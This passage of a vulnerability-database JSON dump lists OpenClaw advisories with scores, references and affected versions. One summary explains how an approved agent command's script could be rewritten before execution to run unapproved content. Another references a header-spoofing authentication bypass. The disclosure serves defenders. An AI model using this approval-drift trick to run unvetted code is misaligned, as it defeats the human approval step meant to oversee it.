reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35656","reference_id":"","reference_type":"","scores":[{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45223","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45206","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00224","scoring_system":"epss","scoring_elements":"0.45226","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35656"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35656","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35656"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter"},{"reference_url":"https://github.com/advisories/GHSA-844j-xrrq-wgh4","reference_id":"GHSA-844j-xrrq-wgh4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-844j-xrrq-wgh4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35656","GHSA-844j-xrrq-wgh4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sw3m-5ryw-jbdh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50914?format=json","vulnerability_id":"VCID-swjf-k83n-h7gf","summary":"OpenClaw's system.run approvals did not bind mutable script operands across approval and execution\nOpenClaw's `system.run` approval flow did not bind mutable interpreter-style script operands across approval and execution.\n\nA caller could obtain approval for an execution such as `sh ./script.sh`, rewrite the approved script before execution, and then execute different content under the previously approved command shape. The approved `argv` values remained the same, but the mutable script operand content could drift after approval.\n\nLatest published npm version verified vulnerable: `2026.3.7`\n\nThe initial March 7, 2026 fix in `c76d29208bf6a7f058d2cf582519d28069e42240` added approval binding for shell scripts and a narrow interpreter set, but follow-up maintainer review on March 8, 2026 found that `bun` and `deno` script operands still did not produce `mutableFileOperand` snapshots.\n\nA complete fix shipped on March 9, 2026 in `cf3a479bd1204f62eef7dd82b4aa328749ae6c91`, which binds approved `bun` and `deno run` script operands to on-disk file snapshots and denies post-approval script drift before execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20423","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20566","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20552","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32921"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run"},{"reference_url":"https://github.com/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8g75-q649-6pv6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2